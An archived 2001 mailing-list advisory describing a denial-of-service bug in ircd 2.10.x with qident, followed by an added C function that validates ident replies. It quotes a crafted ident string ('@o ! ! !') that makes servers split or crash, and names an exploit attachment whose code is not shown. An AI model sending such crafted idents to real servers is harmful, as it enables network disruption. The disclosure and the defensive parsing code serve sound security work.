I don't think that has been posted before. There is a bug in ircd 2.10.x used in ircnet in conjunction with qident.

DESCRIPTION
-----------
qident does not successfully check for spaces and characters like *, ! and @. When using an ident like "@o ! ! !", o would be treated as host, and the parameters which are left would be enhanced by the number of spaces provided by the ident. If this ident is accepted, the connected client will become a ghost. This ghost is not successfully transmitted to the IRC network and is therefore only visible on the server it connects to.

That would not be problematic, but the real problems occur when the bogus idented client joins a channel. The join is not rejected by the network and transfers the bogus ident with the parameters. Then a "protocol error" occurs and the server is forced to split from the rest of the network. It gets more problematic when the bogus client gets collided. This can lead to a denial of service, crashing the ircd completely.

FIXES
-----
The opers were informed quite a while ago; there are only some servers left which react to that bogus ident.

EXPLOIT
-------
Attached you will find a simple exploit, which starts an irc client with a spoofed ident. in.identd should not be running while the exploit is used. Also, you have to be root (used for the bind). And it's written for linux.

GREETINGS
---------
especially to suffkopp and his friend newroot. those lamers forced me to make it public.

so far,
psychoid
www.psychoid.lam3rz.de

[attachment: doomzday4.c]
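
The check that the DESCRIPTION says is missing, written here as an added C example; it is not code from the original post, ircd or qident. It parses one RFC 1413 ident reply and accepts the userid only if it contains no blanks and none of `*`, `!`, `@`. The function name, the 10-character limit and the extra rejection of `:` are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define USERID_MAX 10 /* assumed length limit for this example */

/* Parse one RFC 1413 reply line. Returns 1 and copies the userid to out when
 * it is safe to embed in a nick!user@host prefix, otherwise returns 0. */
int ident_userid_ok(const char *reply, char *out, size_t outlen)
{
    unsigned lport = 0, fport = 0;
    int off = 0;
    size_t len, i;
    const char *id;

    /* "<port> , <port> : USERID : <opsys> : <userid>"; off stays 0 on a short match */
    if (sscanf(reply, " %u , %u : USERID : %*[^:\r\n] :%n", &lport, &fport, &off) != 2
        || off == 0)
        return 0;
    if (lport < 1 || lport > 65535 || fport < 1 || fport > 65535)
        return 0;

    id = reply + off;
    while (*id == ' ' || *id == '\t')   /* leading blanks are not part of the name */
        id++;
    len = strcspn(id, "\r\n");
    while (len > 0 && (id[len - 1] == ' ' || id[len - 1] == '\t'))
        len--;                          /* nor are trailing ones */
    if (len == 0 || len > USERID_MAX || len >= outlen)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)id[i];
        /* blanks and control bytes would add parameters; *, !, @ (and ':',
         * an extra assumption here) would break the prefix or act as wildcards */
        if (!isgraph(c) || strchr("*!@:", c) != NULL)
            return 0;
    }
    memcpy(out, id, len);
    out[len] = '\0';
    return 1;
}

int main(void)
{
    char user[USERID_MAX + 1];
    /* Constructed replies: a normal one and the ident string quoted in the post. */
    printf("%d\n", ident_userid_ok("1025 , 6667 : USERID : UNIX : alice\r\n", user, sizeof user));
    printf("%d\n", ident_userid_ok("1025 , 6667 : USERID : UNIX : @o ! ! !\r\n", user, sizeof user));
    return 0;
}
```

A server that gets 0 back should treat the connection as if no ident reply had arrived, so the rejected string is never propagated to other servers.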
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:55:46 PDT